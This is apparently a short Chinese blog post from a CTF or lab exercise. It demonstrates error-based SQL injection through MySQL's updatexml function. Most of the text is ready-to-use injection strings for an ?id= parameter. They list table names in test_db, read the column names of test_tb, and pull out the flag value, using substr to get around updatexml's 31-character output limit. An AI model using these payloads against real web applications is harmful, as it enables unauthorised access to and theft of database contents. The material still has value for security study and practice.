文章展示了针对数据库的SQL注入攻击手法,利用Updatexml函数获取test_db数据库中的表名,test_tb表的列名,以及test_tb表中flag字段的数据。由于Updatexml限制了输出长度,部分数据被截断显示。
?id=1' and updatexml(1,concat('~',substr((select group_concat(table_name)from information_schema.tables where table_schema='test_db'),1,31),'~'),1)--+
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='test_tb'),'~'),1)--+
?id=1' and updatexml(1,concat('~',(select concat(flag) from test_tb),'~'),1)--+
updatexml只输出前31位
?id=1' and updatexml(1,concat('~',substr((select concat(flag) from test_tb),31,60),'~'),1)--+
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
